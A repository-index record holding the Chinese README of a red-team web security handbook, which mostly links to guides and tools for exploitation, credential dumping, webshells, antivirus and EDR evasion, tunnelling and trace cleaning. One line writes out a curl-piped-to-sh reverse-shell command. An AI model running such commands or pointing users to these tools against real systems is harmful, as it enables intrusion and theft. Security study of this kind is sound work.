{"id":13488315,"url":"https://github.com/ReAbout/web-sec","last_synced_at":"2025-03-28T00:33:34.266Z","repository":{"id":41154992,"uuid":"175117567","full_name":"ReAbout/web-sec","owner":"ReAbout","description":"WEB安全手册(红队安全技能栈),漏洞理解,漏洞利用,代码审计和渗透测试总结。【持续更新】","archived":false,"fork":false,"pushed_at":"2025-03-08T04:35:32.000Z","size":1381,"stargazers_count":1682,"open_issues_count":0,"forks_count":258,"subscribers_count":41,"default_branch":"master","last_synced_at":"2025-03-08T05:23:59.859Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ReAbout.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-03-12T02:13:09.000Z","updated_at":"2025-03-08T04:35:36.000Z","dependencies_parsed_at":"2023-01-31T05:45:51.851Z","dependency_job_id":"432997fb-e92f-4f56-aa26-877fb8d21e6a","html_url":"https://github.com/ReAbout/web-sec","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReAbout%2Fweb-sec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReAbout%2Fweb-sec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReAbout%2Fweb-sec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReAbout%2Fweb-sec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ReAbout","download_url":"https://codeload.github.com/ReAbout/web-sec/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245949256,"owners_count":20698911,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T18:01:13.621Z","updated_at":"2025-03-28T00:33:29.243Z","avatar_url":"https://github.com/ReAbout.png","language":"Python","readme":"# WEB 安全手册\n\u003cimg src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\"\u003e \u003cimg src=\"https://img.shields.io/github/stars/ReAbout/web-sec?style=social\"\u003e \u003cimg src=\"https://img.shields.io/github/forks/ReAbout/web-sec?style=social\"\u003e\n\n【声明】个人的快速查询目录,经验整理,仅供参考。 \n【内容】包括个人对漏洞理解、漏洞利用、代码审计和渗透测试的整理,也收录了他人相关的知识的总结和工具的推荐。 \n\n## 目录\n * [0x00 技能栈](#0x00-技能栈)\n * [0x01 漏洞理解篇(Vulnerability)](#0x01-漏洞理解篇vulnerability)\n * [1.1 前端](#11-前端)\n * [1.2 后端](#12-后端)\n * [1.3 打造自己的知识库](#13-打造自己的知识库)\n * [0x02 漏洞利用篇(Exploit)](#0x02-漏洞利用篇exploit)\n * [2.1 前端安全-XSS](#21-前端安全-xss)\n * [2.2 前端安全-CSRF](#22-前端安全-csrf)\n * [2.9 Server-side request forgery (SSRF)](#29-server-side-request-forgery-ssrf)\n * [2.4 [注入]SQL注入\u0026数据库漏洞利用](#24--注入sql注入数据库漏洞利用)\n * [2.5 [注入]模板注入 Server Side Template Injection (SSTI)](#25-注入模板注入-server-side-template-injection-ssti)\n * [2.6 [注入]命令注入\u0026代码执行](#26-注入命令注入代码执行)\n * [2.7 [注入]Xpath注入](#27-注入xpath注入)\n * [2.8 XML External Entity (XXE)](#28-xml-external-entity-xxe)\n * [2.9 文件操作漏洞](#29-文件操作漏洞)\n * [2.10 反序列化漏洞](#210-反序列化漏洞)\n * [2.11 包含漏洞](#211-包含漏洞)\n * [2.12 Java-特性漏洞](#212-java-特性漏洞)\n * [2.13 NodeJs-特性漏洞](#213-nodejs-特性漏洞)\n * [2.14 不一致性](#214-不一致性)\n * [0x03 代码审计篇(Audit)](#0x03-代码审计篇audit)\n * [3.1 PHP](#31-php)\n * [3.2 JAVA](#32-java)\n * [3.3 .NET](#33-net)\n * [3.4 Perl CGI](#34-perl-cgi)\n * [0x04 渗透篇(Penetration)](#0x04-渗透篇penetration)\n * [4.1 网络预置](#41-网络预置)\n * [4.1.1 代理客户端(环境准备)](#411-代理客户端环境准备)\n * [4.1.2 常规信息(单兵)](#412-常规信息单兵)\n * [4.1.3 资产搜索引擎(大数据)](#413-资产搜索引擎大数据)\n * [4.1.4 移动端信息收集](#414-移动端信息收集)\n * [4.1.5 近源渗透(WiFi)](#415-近源渗透wifi)\n * [4.2 网络接入(exp)](#42-网络接入exp)\n * [4.2.1 漏洞验证(扫描器)](#421-漏洞验证扫描器)\n * [4.2.1.1 主动式](#4211-主动式)\n * [4.2.1.2 被动式](#4212-被动式)\n * [4.2.2漏洞利用(1day)](#422漏洞利用1day)\n * [4.2.2.1 漏洞利用知识](#4221-漏洞利用知识)\n * [4.2.2.2 漏洞利用工具](#4222-漏洞利用工具)\n * [4.2.2.3 dnslog平台](#4223-dnslog平台)\n * [4.2.3 字典](#423-字典)\n * [4.3 权限获取\u0026提升](#43-权限获取提升)\n * [4.3.1 Win](#431-win)\n * [4.3.2 Linux](#432-linux)\n * [4.3.3 Docker\u0026Sandbox逃逸](#433-dockersandbox逃逸)\n * [4.4 权限维持\u0026后门](#44-权限维持后门)\n * [4.4.1 通用](#441-通用)\n * [4.4.2 Shell会话](#442-shell会话)\n * [4.4.2 Webshell](#442-webshell)\n * [4.4.3 PC \u0026 Server](#443-pc--server)\n * [4.4.4 Mobile (Android \u0026 ios)](#444-mobile-android--ios)\n * [4.5 免杀](#45-免杀)\n * [4.5.1 二进制免杀](#451-二进制免杀)\n * [4.5.2 webshell免杀和WAF逃逸](#452-webshell免杀和waf逃逸)\n * [4.6 隧道\u0026代理](#46-隧道代理)\n * [4.6.1 TCP隧道](#461-tcp隧道)\n * [4.6.2 HTTP隧道](#462-http隧道)\n * [4.6.3 DNS隧道](#463-dns隧道)\n * [4.6.3 ICMP隧道](#463-icmp隧道)\n * [4.7 后渗透](#47-后渗透)\n * [4.7.1 内网信息获取\u0026执行](#471-内网信息获取执行)\n * [4.7.2 轻量级扫描工具](#472-轻量级扫描工具)\n * [4.7.3 渗透框架](#473-渗透框架)\n * [4.7.4 域渗透](#474-域渗透)\n * [4.7.5 云平台](#475-云平台)\n * [4.8 反溯源](#48-反溯源)\n * [4.9 协同](#49-协同)\n\n\n\n\n## 0x00 技能栈\n依照红队的流程分工,选择适合自己的技能栈发展。 \n\u003e越接近中心的能力点越贴近web技术栈,反之亦然。可以根据自身情况,选择技术栈的发展方向。\n\n![](./images/web-sec.png)\n\n\n## 0x01 漏洞理解篇(Vulnerability)\n### 1.1 前端\n\u003e 同源策略 \u0026 CSP \u0026 JOSNP\n- [跨域安全](./vul/VUL-CrossDomain.md)\n### 1.2 后端\n\u003e 应用分层 \u0026 漏洞分类\n- [错综复杂的后端逻辑及安全](./vul/VUL-Backend.md)\n\n### 1.3 打造自己的知识库\n\u003e爬取范围包括先知社区、安全客、Seebug Paper、跳跳糖、奇安信攻防社区、棱角社区\n- [**[Tool]** 推送安全情报爬虫@Le0nsec](https://github.com/Le0nsec/SecCrawler)\n\n## 0x02 漏洞利用篇(Exploit)\n### 2.1 前端安全-XSS\n\u003e XSS 利用的是用户对指定网站的信任 \n- [Cross Site Scripting (XSS)](https://github.com/ReAbout/web-exp/blob/master/exp/EXP-XSS.md)\n ### 2.2 前端安全-CSRF\n\u003e CSRF 利用的是网站对用户网页浏览器的信任 \n- [Client-side request forgery (CSRF)](https://github.com/ReAbout/web-exp/blob/master/exp/EXP-CSRF.md)\n### 2.9 Server-side request forgery (SSRF)\n- [SSRF](https://github.com/ReAbout/web-exp/blob/master/exp/EXP-SSRF.md)\n\n### 2.4 [注入]SQL注入\u0026数据库漏洞利用\n- [SQL injection - MySQL](./exp/EXP-SQLi-MySQL.md)\n- [SQL injection - Oracle](./exp/EXP-SQLi-Oracle.md)\n- [SQL injection - MSSQL](./exp/EXP-DB-MSSQL.md) \n\u003e MySQL,Oracle,MSSQL和PostgreSQL的OOB方法\n- [SQL injection - 信息外带(OOB)](./exp/EXP-SQLi-OOB.md)\n\n- [Redis 漏洞利用](./exp/EXP-DB-Redis.md)\n\u003e go写的命令行版本\n- [**[Tool]** 数据库综合利用工具](https://github.com/Hel10-Web/Databasetools)\n\u003e 程序检测参数不能为空,导致空口令无法利用\n- [**[Tool]** 数据库综合利用工具](https://github.com/Ryze-T/Sylas)\n- [**[Tool]** MSSQL利用工具](https://github.com/uknowsec/SharpSQLTools)\n\n### 2.5 [注入]模板注入 Server Side Template Injection (SSTI)\n\u003e MVC架构中,模板参数恶意输入产生的安全问题\n- [STTI 总述](./exp/EXP-SSTI-ALL.md)\n- [SSTI -Python](./exp/EXP-SSTI-Python.md)\n- [SSTI -PHP](./exp/EXP-SSTI-PHP.md)\n- [SSTI Payload @payloadbox](https://github.com/payloadbox/ssti-payloads)\n\n\n### 2.6 [注入]命令注入\u0026代码执行\n- [命令注入\u0026代码执行-PHP](./exp/EXP-CI-PHP.md)\n- [命令注入\u0026代码执行-Java](./exp/EXP-CI-Java.md)\n### 2.7 [注入]Xpath注入\n\u003e XPath 即为 XML 路径语言\n- [XPath Injection](./exp/EXP-XPath.md)\n### 2.8 XML External Entity (XXE) \n- [XXE](./exp/EXP-XXE.md)\n### 2.9 文件操作漏洞\n- [文件上传漏洞](./exp/EXP-Upload.md)\n- [文件上传漏洞WAF绕过-JSP](./exp/EXP-Upload-JSP.md)\n\u003e 远古时期的通杀利器\n- [FCKeditor编辑器漏洞利用](./exp/EXP-FCK.md)\n\n### 2.10 反序列化漏洞\n\u003ephp,java只能序列化数据,python可以序列化代码。 \n- [反序列化漏洞-PHP](./exp/EXP-PHP-Unserialize.md)\n- [反序列化漏洞-Java](./exp/EXP-Java-Unserialize.md)\n- [**[Tool]** 反序列化漏洞利用工具-Java ysoserial](https://github.com/frohoff/ysoserial)\n\u003e 拓展payload和添加脏数据绕过waf功能\n- [**[Tool]** 反序列化漏洞利用工具 针对Java ysoserial进行拓展](https://github.com/su18/ysoserial)\n\n### 2.11 包含漏洞\n- [包含漏洞-PHP](https://github.com/ReAbout/web-exp/blob/master/exp/EXP-Include-PHP.md)\n\n### 2.12 Java-特性漏洞\n- [表达式(EL)注入](./exp/EXP-Expression-Injection.md)\n- [Spring表达式(SPEL)注入](./exp/EXP-SPEL-Injection.md)\n\u003e Confluence和Struct2都使用OGNL\n- [OGNL表达式注入](./exp/EXP-OGNL-Injection.md)\n- [SprintBoot漏洞利用清单@LandGrey](https://github.com/LandGrey/SpringBootVulExploit)\n\u003e 按照清单做的配套工具\n- [**[Tool]** SprintBoot漏洞利用工具](https://github.com/0x727/SpringBootExploit)\n\n### 2.13 NodeJs-特性漏洞\n- [Node.js 原型链污染](https://github.com/ReAbout/web-exp/blob/master/exp/EXP-nodejs-proto.md)\n### 2.14 不一致性\n\u003e 利用前后DNS解析的不一致(劫持或者逻辑问题) \n- [DNS rebinding 攻击](./exp/EXP-DNS-Rebinding.md)\n\u003e 前后端不一致性\n- [请求走私总结@chenjj](https://github.com/chenjj/Awesome-HTTPRequestSmuggling)\n\n## 0x03 代码审计篇(Audit)\n\n### 3.1 PHP\n\u003e vscode\u0026phpstorm方案,xdebug2.X和xdebug3.X配置\n- [PHP调试环境的搭建](./audit/AUD-PHP-Debug.md)\n- [PHP代码审计@bowu678](https://github.com/bowu678/php_bugs)\n- [PHP代码审计入门指南@burpheart](https://github.com/burpheart/PHPAuditGuideBook)\n### 3.2 JAVA\n- [Java调试环境的搭建](./audit/AUD-Java-Debug.md)\n\u003e自己整理的Java代码审计\n- [Java代码审计手册](https://github.com/ReAbout/audit-java)\n- [Java代码审计@cn-panda](https://github.com/cn-panda/JavaCodeAudit)\n- [Java安全@Y4tacker](https://github.com/Y4tacker/JavaSec)\n- [Java漏洞平台@j3ers3](https://github.com/j3ers3/Hello-Java-Sec)\n\n### 3.3 .NET\n- [.Net反序列化@Ivan1ee](https://github.com/Ivan1ee/NET-Deserialize)\n\n### 3.4 Perl CGI\n\u003e Perl CGI快速上手,了解Perl语言特性\n- [Perl基础\u0026代码审计@mi1k7ea](https://www.mi1k7ea.com/2020/11/24/Perl%E5%9F%BA%E7%A1%80-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/)\n\n## 0x04 渗透篇(Penetration)\n【流程】网络预置(准备\u0026信息收集)--\u003e网络接入(外网突破)--\u003e权限获取和提升--\u003e权限维持(后门)--\u003e后渗透 \n【基础】---免杀+++反溯源+++协同---\n\n\n### 4.1 网络预置\n\n#### 4.1.1 代理客户端(环境准备)\n\u003e 操作系统 on VM + OpenWrt网关 on VM = 全局跳板\n- [全局代理[VMware]:Openwrt on VMware网关方案](./penetration/PEN-Openwrt.md)\n\n\u003e 全局代理,虚拟网卡,需要手动配路由\n- [全局代理[Win]:Windows下socks客户端全局代理终极解决方案——tun2socks](./penetration/PEN-Tun2socks.md)\n\n\u003e SSTap全局代理也是基于虚拟网卡方案,可惜已停止更新,推荐使用1.0.9.7版本\n- [**[Tool]** Windows下全局代理客户端工具 SSTap](https://github.com/solikethis/SSTap-backup)\n\n\u003e 【推荐!】Clash for Windows支持TAP模式基于虚拟网卡方案,走全局\n- [**[Tool]** Windows下全局代理客户端工具 Clash for Windows](https://github.com/Fndroid/clash_for_windows_pkg)\n\n\u003eProxifier 全局代理支持并不好,可以设置规则选择指定程序走代理或直连\n- [**[Tool]** Windows下代理客户端工具 Proxifier](https://www.proxifier.com/)\n\n- [**[Tool]** Windows版 proxychains](https://github.com/shunf4/proxychains-windows)\n\n#### 4.1.2 常规信息(单兵)\n- [外网信息收集思路](https://github.com/ReAbout/web-exp/blob/master/penetration/PEN-Info.md)\n- [IP地址信息网站 ipip.net](http://ipip.net)\n- [IP反查域名和子域名查询 rapiddns.io](https://rapiddns.io/)\n\u003e 有域名层级图,更直观\n- [子域名查询 dnsdumpster](https://dnsdumpster.com/)\n#### 4.1.3 资产搜索引擎(大数据)\n- [fofa.so](https://fofa.so) \n- [shodan.io](https://www.shodan.io/) \n- [zoomeye.org](https://www.zoomeye.org/)\n- [censys.io](https://search.censys.io/)\n#### 4.1.4 移动端信息收集\n\u003e从移动端拓展目标信息\n- [**[Tool]** 移动端信息收集工具 AppInfoScanner](https://github.com/kelvinBen/AppInfoScanner) \n- [**[Tool]** 安全分析框架 MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)\n\n#### 4.1.5 近源渗透(WiFi)\n\u003e 高通410随身wifi改造\n- [打造近源渗透工具](./penetration/PEN-WiFi-Tool.md)\n\n### 4.2 网络接入(exp)\n\n#### 4.2.1 漏洞验证(扫描器)\n\u003e 工欲其善必先利器\n##### 4.2.1.1 主动式\n - [**[Tool]** AWVS Docker版](https://hub.docker.com/r/secfa/docker-awvs)\n - [**[Tool]** 长亭的扫描器 Xray](https://github.com/chaitin/xray) \n - [**[Tool]** Vulmap](https://github.com/zhzyker/vulmap) \n - [**[Tool]** 红队综合渗透框架SatanSword@Lucifer1993](https://github.com/Lucifer1993/SatanSword)\n##### 4.2.1.2 被动式\n\u003e将Burpusuite打造成一个被动式扫描器 \n- [**[Tool]** BurpSutie 插件集合@Mr-xn](https://github.com/Mr-xn/BurpSuite-collections) \n\n#### 4.2.2漏洞利用(1day)\n##### 4.2.2.1 漏洞利用知识\n- [漏洞索引表]()【待整理】\n\u003e IoT安全 \u0026 web安全\u0026 系统漏洞 1day整理\n- [漏洞利用wiki](https://wiki.96.mk/)\n- [红队中易被攻击的一些重点系统漏洞整理@r0eXpeR](https://github.com/r0eXpeR/redteam_vul)\n- [织梦全版本漏洞扫描@lengjibo](https://github.com/lengjibo/dedecmscan)\n##### 4.2.2.2 漏洞利用工具\n\u003e oa\n- [**[Tool]** 国内OA系统漏洞检测](https://github.com/LittleBear4/OA-EXPTOOL)\n\u003e struts2:利用功能已删除,仅支持检测\n- [**[Tool]** Struts2漏洞扫描\u0026利用](https://github.com/HatBoy/Struts2-Scan)\n\u003e struts2:GUI,功能齐全\n- [**[Tool]** Struts2漏洞扫描\u0026利用](https://github.com/abc123info/Struts2VulsScanTools)\n\u003e shiro:GUI,支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测\n- [**[Tool]** shiro反序列化漏洞利用](https://github.com/feihong-cs/ShiroExploit-Deprecated)\n\u003e shiro:Python,方便修改代码,支持2种加密格式\n- [**[Tool]** shiro反序列化漏洞利用](https://github.com/Ares-X/shiro-exploit)\n\u003e fastjson\n- [**[Tool]** Fastjson漏洞快速利用框架](https://github.com/c0ny1/FastjsonExploit)\n\u003e fastjson:各类poc,方便手动测试\n- [Fastjson姿势技巧集合@safe6Sec](https://github.com/safe6Sec/Fastjson)\n\u003e exchange:爆破\n- [**[Tool]** EBurstGo Exchange 服务器 Web 接口爆破邮箱账户](https://github.com/X1r0z/EBurstGo)\n\u003e confluence\n- [**[Tool]** ConfluenceMemshell Confluence利用工具(CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527)](https://github.com/Lotus6/ConfluenceMemshell)\n\n##### 4.2.2.3 dnslog平台\n\u003e 用于出网检测,无回显命令执行检测\n- [dnslog.cn](http://dnslog.cn/)\n- [ceye](http://ceye.io/)\n\u003e【推荐!】好用,开源\n- [requestrepo](https://requestrepo.com/)\n\n\n#### 4.2.3 字典\n\n- [常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等@insightglacier](https://github.com/insightglacier/Dictionary-Of-Pentesting)\n- [Fuzzing相关字典@TheKingOfDuck](https://github.com/TheKingOfDuck/fuzzDicts)\n\u003e全拼用户名10w\n- [爆破字典](https://github.com/rootphantomer/Blasting_dictionary)\n\n### 4.3 权限获取\u0026提升\n#### 4.3.1 Win\n**权限获取:** \n\u003e 离线|在线|破解\n- [Windows 认证凭证获取](./penetration/PEN-GetHash.md) \n- [**[Tool]** mimikatz Windows认证凭证提取神器](https://github.com/gentilkiwi/mimikatz)\n- [**[Tool]** go-secdump 利用smb远程无文件落地获取@jfjallid](https://github.com/jfjallid/go-secdump)\n\n**提权:** \n- [Windows提权检测工具 Windows Exploit Suggester](https://github.com/bitsadmin/wesng)\n\u003e 已经停止更新到CVE-2018\n- [Windows提权漏洞集合@SecWiki](https://github.com/SecWiki/windows-kernel-exploits)\n- [PetitPotato for Win10](https://github.com/wh0amitz/PetitPotato)\n- [CVE-2022-24481](https://github.com/robotMD5/CVE-2022-24481-POC)\n#### 4.3.2 Linux\n**权限获取:** \n- [Linux 认证凭证获取](./penetration/PEN-GetHash-Linux.md)\n\n**提权:** \n- [Linux 提权检测脚本 lse.sh](https://github.com/diego-treitos/linux-smart-enumeration)\n- [Linux setuid提权](./penetration/PEN-Setuid-Linux.md)\n\u003e 已经停止更新到CVE-2018\n- [Linux提权漏洞集合@SecWiki](https://github.com/SecWiki/linux-kernel-exploits)\n\n#### 4.3.3 Docker\u0026Sandbox逃逸\n\n- [Dokcer容器逃逸@duowen1](https://github.com/duowen1/Container-escape-exps)\n\n### 4.4 权限维持\u0026后门\n#### 4.4.1 通用\n\u003e backdoor生成,meterpreter操作指令\n- [Meterpreter of Metasploit 使用教程](./penetration/PEN-MSF.md)\n\n#### 4.4.2 Shell会话\n- [反弹/正向 Shell \u0026 升级交互式Shell (Linux\u0026Win)](./penetration/PEN-ReShell.md) \n\u003e curl https://reverse-shell.sh/192.168.0.69:1337 | sh\n- [**[Tool]** reverse-shell](https://github.com/lukechilds/reverse-shell)\n\n#### 4.4.2 Webshell\n- [**[Tool]** WebShell管理工具 菜刀](https://github.com/raddyfiy/caidao-official-version)\n- [**[Tool]** WebShell管理工具 蚁剑](https://github.com/AntSwordProject/AntSword-Loader)\n- [**[Tool]** WebShell管理工具 冰蝎](https://github.com/rebeyond/Behinder)\n- [**[Tool]** WebShell管理工具 哥斯拉](https://github.com/BeichenDream/Godzilla)\n- [收集的各种Webshell@tennc](https://github.com/tennc/webshell)\n- [Webshell 命令执行失败问题解决](./penetration/PEN-Webshell-Question.md)\n\n#### 4.4.3 PC \u0026 Server\n- [**[Tool]** Cobalt Strike ]()\n- [Cobalt Strike资料汇总@zer0yu](https://github.com/zer0yu/Awesome-CobaltStrike)\n#### 4.4.4 Mobile (Android \u0026 ios) \n### 4.5 免杀\n#### 4.5.1 二进制免杀\n- [免杀系列文章及配套工具@TideSec](https://github.com/TideSec/BypassAntiVirus)\n##### shellcode加载器\n- [**[Tool]** LoaderGo免杀工具@di0xide-U](https://github.com/di0xide-U/LoaderGo)\n- [**[Tool]** 千机-红队免杀木马自动生成器@Pizz33](https://github.com/Pizz33/Qianji)\n- [**[Tool]** RingQ@T4y1oR](https://github.com/T4y1oR/RingQ)\n- [**[Tool]** darkPulse@fdx-xdf](https://github.com/fdx-xdf/darkPulse)\n##### kill杀软\n- [**[Tool]** 强关进程EDR-XDR-AV-Killer@EvilBytecode](https://github.com/EvilBytecode/EDR-XDR-AV-Killer) \n- [**[Tool]** 强关Windows defender@es3n1n](https://github.com/es3n1n/no-defender)\n##### rootkit\n- [**[Tool]** shadow-rs@joaoviictorti](https://github.com/joaoviictorti/shadow-rs)\n\n#### 4.5.2 webshell免杀和WAF逃逸\n- [Webshell免杀\u0026WAF逃逸](./penetration/Webshell-Bypass.md)\n- [**[Tool]** 哥斯拉WebShell免杀生成@Tas9er](https://github.com/Tas9er/ByPassGodzilla)\n- [**[Tool]** 冰蝎WebShell免杀生成@Tas9er](https://github.com/Tas9er/ByPassBehinder)\n- [**[Tool]** 免杀webshell生成集合工具@cseroad](https://github.com/cseroad/Webshell_Generate)\n- [**[Tool]** XG拟态-Webshell静态免杀+流量逃逸@xiaogang000](https://github.com/xiaogang000/XG_NTAI)\n- [**[Tool]** 哥斯拉二次开发-WAF逃逸+免杀@kong030813](https://github.com/kong030813/Z-Godzilla_ekp)\n- \n### 4.6 隧道\u0026代理\n#### 4.6.1 TCP隧道\n- [SSH 端口转发\u0026开socks5](./penetration/PEN-ssh.md)\n- [Iptables 端口复用](./penetration/PEN-Reuse.md)\n \u003e FRP 客服端和服务端配合的端口转发工具\n- [**[Tool]** 反向端口转发工具 FRP](https://github.com/fatedier/frp)\n\u003e Venom 可以嵌套多层代理,适合多层无外网的渗透测试,停止更新\n- [**[Tool]** 内网多级代理服务端工具 Venom](https://github.com/Dliv3/Venom/releases)\n\u003e 【推荐!】比Venom更加稳定,持续更新\n- [**[Tool]** 内网多级代理服务端工具 Stowaway](https://github.com/ph4ntonn/Stowaway)\n#### 4.6.2 HTTP隧道\n\u003eHTTP代理,国内更新维护\n- [**[Tool]** HTTP代理 Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg)\n\u003eHTTP代理,号称性能是neo的10倍\n- [**[Tool]** HTTP代理 suo5](https://github.com/zema1/suo5)\n#### 4.6.3 DNS隧道\n- [**[Tool]** DNS隧道工具 iodine](https://github.com/yarrick/iodine)\n#### 4.6.3 ICMP隧道\n- [**[Tool]** ICMP隧道工具 PingTunnel](https://github.com/esrrhs/pingtunnel)\n\n\n### 4.7 后渗透\n#### 4.7.1 内网信息获取\u0026执行\n\u003e 信息获取 \u0026 远程文件操作 \u0026 远程执行命令 \u0026 ipc$ \u0026 wmi \u0026 winrm\n- [Windows 主机常用命令](./penetration/PEN-WinCmd.md)\n\u003e 超强神器,wmi,smb等执行脚本,python方便liunx使用\n- [**[Tool]** Impacket](https://github.com/fortra/impacket)\n\u003e 可以提取流量中用户名\u0026密码,NTML Hash,图片等,以及绘制网络拓扑。\n- [**[Tool]** 流量取证工具 BruteShark](https://github.com/odedshimon/BruteShark)\n\u003e Windows rdp相关的登录记录导出工具。\n- [**[Tool]** 浏览器数据导出解密工具](https://github.com/moonD4rk/HackBrowserData)\n- [**[Tool]** SharpRDPLog](https://github.com/Adminisme/SharpRDPLog)\n \u003e Xshell在本地保存的密码进行解密\n- [**[Tool]** SharpXDecrypt](https://github.com/JDArmy/SharpXDecrypt)\n#### 4.7.2 轻量级扫描工具\n\u003e 内网扫描神器,go语言跨平台,效率快,支持各类口令爆破,还有主机识别和web服务识别。\n- [**[Tool]** fscan](https://github.com/shadow1ng/fscan)\n\u003e k8 team的内网扫描器\n- [**[Tool]** Landon](https://github.com/k8gege/LadonGo)\n\n#### 4.7.3 渗透框架\n- [**[Tool]** 后渗透利用神器 Metasploit](https://www.metasploit.com/)\n- [**[Tool]** 内网横向拓展系统 InScan](https://github.com/inbug-team/InScan)\n- [**[Tool]** 开源图形化内网渗透工具 Viper](https://github.com/FunnyWolf/Viper)\n#### 4.7.4 域渗透\n- [域渗透@uknowsec](https://github.com/uknowsec/Active-Directory-Pentest-Notes)\n- 域提权:MS14-068,CVE-2020-1472(Zerologon),CVE-2021-42287/CVE-2021-42278,CVE-2022-26923\n\n#### 4.7.5 云平台\n\u003ek8s渗透\n- [从零开始的Kubernetes攻防@neargle](https://github.com/neargle/my-re0-k8s-security) \n\u003e通过accesskey获取相关主机权限执行命令\n- [**[Tool]** Aliyun Accesskey Tool](https://github.com/mrknow001/aliyun-accesskey-Tools)\n- [**[Tool]** CF 云环境利用框架](https://github.com/teamssix/cf)\n\n### 4.8 反溯源 \n - [Linux 痕迹清理](./penetration/PEN-LinuxClear.md)\n - [攻击和反制@Getshell](https://github.com/Getshell/Fanzhi)\n### 4.9 协同\n- [HackMD markdown协同工具(Docker版)](https://hackmd.io/c/codimd-documentation/%2Fs%2Fcodimd-docker-deployment)\n\u003e 简单,美观\n- [文件管理系统](https://github.com/filebrowser/filebrowser)\n## Other\n[toc目录生成工具](https://houbb.github.io/opensource/markdown-toc/)\n\n![Star History Chart](https://api.star-history.com/svg?repos=ReAbout/web-sec\u0026type=Date)\n","funding_links":[],"categories":["Python","漏洞库、漏洞靶场","LLM分析过程"],"sub_categories":["网络服务_其他"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FReAbout%2Fweb-sec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FReAbout%2Fweb-sec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FReAbout%2Fweb-sec/lists"}